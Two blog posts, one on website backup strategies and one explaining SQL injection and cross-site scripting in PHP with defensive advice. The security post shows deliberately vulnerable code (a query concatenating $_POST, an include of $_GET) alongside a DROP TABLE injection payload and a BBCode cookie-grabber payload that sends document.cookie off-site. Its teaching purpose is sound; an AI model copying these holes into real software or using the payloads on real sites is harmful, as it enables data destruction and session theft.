

A lot of the time when I talk to site owners, one of the first questions I ask them is "what is your backup strategy?"  And shockingly enough, I've seen so many strategies that would make me not want to sleep at night.

I've seen people who are so sure of their code that they decide they don't actually need to make backups, which just tells me how immature they are.  Do they really think the only thing that could affect their code's well-being is the code itself?  How about the thing it runs on (i.e. the server)?  Servers crash from time to time, and when they do you lose data.

The next "backup strategy" I've seen is people using cPanel or some other tool to make a local backup of the site and just leaving it there.  That's great if your database gets hacked or messed up and you have to revert it.  However, what happens if your server goes into an unrecoverable state?  Then you are out of luck, because you put all of your eggs in one basket.  The funny thing is, sometimes these people's backups require them to manually go in and click a button.  I would personally at least look for a somewhat automated approach, because the last thing you want is to have to revert your site's content back 1-2 months because you "forgot to take a backup".

Now that we have gone through two of the most common backup "strategies" I have seen, let me talk about the ones I would prefer to see people using.


  • Source Control - in this day and age there really isn't a reason why your code couldn't be in source control.  You can choose whichever flavour you like (be it Subversion, Git, Mercurial, etc.), and there are normally free services available for private repositories.  This means that repopulating your code is a simple "checkout" or "pull" command.
  • Offsite Backup - normally fairly cheap to set up (assuming you know how): you can get a virtual private server (VPS) and just "rsync" or "scp" data from one server to the other.  As long as this is in a different data centre than your main host, the likelihood of both going down at once is much lower.  Your recovery strategy would be to copy the latest code back to your server and deploy the database.
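As a sketch of the "archive it, then ship it offsite" idea, a small script can bundle the site into a timestamped archive that rsync or scp then pushes to the other server. Python is used here only to keep the example self-contained and runnable; all file names and paths are made up:

```python
import tarfile
import tempfile
import time
from pathlib import Path

def snapshot(src_dir: str, dest_dir: str) -> Path:
    """Bundle src_dir into a timestamped .tar.gz inside dest_dir.

    The resulting file is what you would then rsync/scp to the
    offsite server.
    """
    stamp = time.strftime("%Y%m%d-%H%M%S")
    archive = Path(dest_dir) / f"site-{stamp}.tar.gz"
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(src_dir, arcname=Path(src_dir).name)
    return archive

# Demo against scratch directories (real paths would be your web root
# and a staging directory for outgoing backups):
with tempfile.TemporaryDirectory() as src, tempfile.TemporaryDirectory() as dst:
    (Path(src) / "index.php").write_text("<?php echo 'hi'; ?>")
    print(snapshot(src, dst).name.startswith("site-"))  # → True
```

The timestamp in the file name means old snapshots are never overwritten, so the offsite server accumulates a history you can roll back to.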


  • Master/Slave Server - a master/slave setup allows for constant syncing of your database between two servers.  The actual name varies depending on the platform, however they all use the same concepts: every X minutes the slave server polls the master for any new or updated data, then replays those changes on its local database.  If you are really paranoid (like I am), you can also run a backup off of the slave server every so often; that way you have an extra copy of the complete database (which can be stored externally) and the dump doesn't impact the performance of your actual application.
  • Offsite Backup - similar to code, a database backup is fairly easy to export and ship to another location, since it can all reside in a single file.  Zipping it up and secure-copying it to another server adds a bit more overhead when you are forced to go into disaster-recovery mode, but it will at least protect you in the unfortunate event of a server failure.
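The export-zip-ship step can be a single shell pipeline. A sketch in Python that only builds the command string (the database name, backup host, and remote path are placeholders, not real infrastructure):

```python
import shlex

def dump_pipeline(db: str, backup_host: str, remote_path: str) -> str:
    """Build a shell pipeline that exports the database, compresses it,
    and streams it straight to the offsite machine.  All names here
    are placeholders."""
    return (
        f"mysqldump {shlex.quote(db)} | gzip | "
        f"ssh {shlex.quote(backup_host)} {shlex.quote('cat > ' + remote_path)}"
    )

cmd = dump_pipeline("myapp", "backup.example.com", "/backups/myapp.sql.gz")
print(cmd)
```

Streaming through ssh like this means the dump never needs to fit on the primary server's disk, which matters once the database outgrows your free space.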

If you don't take anything else away from this article, there are two key points I want you to remember:

  • Servers fail; make sure you have a backup plan for when your primary server goes down.
  • Don't rely on someone remembering to take a backup of something, because it will be forgotten.  Set up regularly scheduled jobs to make your backups and store them somewhere safe.
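For the "scheduled jobs" point, a plain crontab is usually enough. The times and script paths below are illustrative assumptions, not a prescription:

```
# m  h  dom mon dow  command
30   2   *   *   *   /usr/local/bin/backup-code.sh
0    3   *   *   *   /usr/local/bin/backup-db.sh
```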

I hope you found this informative!

Thanks for reading.

Posted in tools


I must first start this post with a comic on the topic ... it comes from XKCD: Exploits of a Mom.

Anyways, this shows one of the many reasons why one should never trust any input from a user. Assume that all users have malicious intent and are attempting to break into your site. Of course, this is not always the case; however, when it is, bad things can happen all around. No matter how you are getting data from the user (be it through an input field, the URL, a hidden field, a drop-down list, etc.), users are able to change the information to better suit their attacking desires. This means you should always make sure the data is within the bounds of what is expected! What are some examples of bad things that can happen from the use of exploits? I have listed two of the more common threats which I see on a day-to-day basis.

  • SQL Injection - as portrayed in the comic from XKCD, if the correct security precautions are not in place, anything stored in your database can be eliminated within seconds or, worse, modified in a manner you will not notice until it's too late. For example, say you are working on a website with a built-in 'karma' system where the higher 'karma' a user has, the more things they are allowed to do on the site. If the website allows SQL injection (accidentally, of course), what is to stop a user from slowly increasing their 'karma' at a gradual rate until they reach a new 'karma' category? Would this be noticeable? Probably not. Either way, whether the attacker truncates or deletes your tables, or merely updates their own records to get more out of the site than they have earned, these are all bad things which could happen ... and can easily be prevented by becoming aware of what is going on around you.
  • Cross Site Scripting (XSS) - security flaws unintentionally coded into applications which allow the user to inject special code into a site, which can be extremely detrimental. A simple example of XSS would be a cookie grabber. A fair number of the cookie grabbers I have seen come from the use of BBCode and the lack of proper validation for it. The theory behind a simple cookie grabber is that it uses pre-existing JavaScript on the site (or its own) to send site-specific information to a different source. However, cookie grabbers are not the only problem with XSS. If the correct precautions are not in place, the use of PHP's "include" or "require" functions can leave your site acting as a portal through the internet for anybody to use as they please. Similar to SQL injection, this can be prevented with the proper knowledge.
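The standard defence for the SQL case is to bind user data as a parameter instead of concatenating it into the query text. A minimal sketch using Python's sqlite3 module, since the idea is language-agnostic; in PHP the equivalent is a prepared statement:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
conn.executemany("INSERT INTO news VALUES (?, ?)",
                 [(1, "a"), (2, "b"), (3, "c")])

# The user-supplied count is validated (int() rejects anything that is
# not a plain number) and then bound as a parameter, so it can never
# be parsed as part of the SQL text itself.
user_count = "2"
rows = conn.execute("SELECT * FROM news LIMIT ?",
                    (int(user_count),)).fetchall()
print(len(rows))  # → 2
```

A payload like "5; DROP TABLE news" fails the int() conversion before it ever reaches the database, and even a plain number only ever arrives as a bound value.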


SQL Injection

Say you have a form where you allow the user to select how many records they want to display:

<form method="post" action="results.php">
  How many records should be displayed?
  <select name="count">
    <option value="5">5</option>
    <option value="10">10</option>
    <option value="15">15</option>
  </select>
  <input type="submit" />
</form>

And the back end of your application looks something like this:

    $query = "SELECT * FROM `news` LIMIT " . $_POST["count"];
    $res = mysql_query($query);

What is to stop the user from modifying one of the values in the drop down list to:

5; DROP TABLE `news`;

Nothing! However, if you don't prevent such a thing from reaching your query (i.e. if you don't do enough data validation), your entire 'news' table will be dropped from the system, which was probably not what the script was intended to do. (Some database APIs refuse to execute two statements in a single call, but that is not something you should rely on.) I have mentioned this method of prevention before, and I'll mention it again: SQL prepared statements. If data is sent in as a parameter rather than as a direct part of the query string, there is no chance the query will be misinterpreted and two queries executed instead of one.

Cross Site Scripting (XSS)

These security vulnerabilities can be fairly hard to track down, however there is always a way.

Simple XSS

Say your URLs look something like this, where in your actual PHP script you have a server-side include for whatever value was passed in through $_GET. Well, this opens up an entirely new can of worms. Yes, it works for pages which are on your server; however, it will also work for sites that are off-site if you are not careful with your validation. Sample code:

// This is a VERY bad idea, however it is only an example
// (the parameter name 'page' is illustrative)
include($_GET['page']);

If I were to change that URL's parameter from 'temp.php' to an external address, by default PHP will not think anything of it. It will treat the remote website as a file stream just as it does the 'temp.php' which was originally passed in. And lo and behold, somebody is now using your site to access Google. Lesson: validate, and verify that the file exists LOCALLY, before running the include.

Cookie Grabber

Since cookies are only accessible on the site they are associated with, cookie grabbers must use the site itself in order to get the information they need. A fair number of the BBCode implementations I have seen allow gaping holes because of this. Most implementations use regular expressions to pick out the required information (which is exactly what regular expressions should be used for). However, since URLs can contain a large number of characters, most programmers take the greedy approach and match 'anything but the newline character' (the period). The regex is something similar to this (I cannot remember the exact expression):


/\[img=(.+)\]/

Matches are then replaced in the emitted HTML with:

<img alt="" src="$1" />

This is all fine and dandy, and it picks up what is required; however, it also has the ability to pick up more than expected and/or desired. For example, the following input would allow an attacker to gain access to the cookies for a particular site.

[img=" onclick="document.location.href=''+document.cookie]

This has the potential to change the emitted HTML into:

<img alt="" src="" onclick="document.location.href=''+document.cookie" />

Effectively causing your web browser to relocate to a different URL with your cookie in the link, which the attacker can then log for future use. Of course, if a little extra time is spent sanitizing the input, problems like this can be filtered out.
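A tighter BBCode filter is one way to close this hole: restrict what may appear in the URL and escape it before emitting HTML. A sketch in Python (the same change applies to a PHP preg_replace; the exact character restrictions are an assumption to adjust for your needs):

```python
import html
import re

# Instead of a greedy ".", use a character class that forbids quotes
# and "]", so attribute-breaking payloads simply never match.
IMG_TAG = re.compile(r"\[img=([^\]\"']+)\]")

def render_img(bbcode: str) -> str:
    """Convert [img=URL] BBCode to an <img> tag with the URL escaped."""
    def repl(match):
        return '<img alt="" src="%s" />' % html.escape(match.group(1), quote=True)
    return IMG_TAG.sub(repl, bbcode)

print(render_img("[img=http://example.com/a.png]"))
# → <img alt="" src="http://example.com/a.png" />

# The cookie-grabber payload from above contains a quote, so it no
# longer matches at all and is left as plain text:
print(render_img('[img=" onclick="document.location.href=document.cookie]'))
```

Rejecting suspicious input outright, rather than trying to clean it up, keeps the filter easy to reason about.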

In summary: never, ever trust user input. It will only lead you towards worlds of pain. Hope this helps!

Posted in php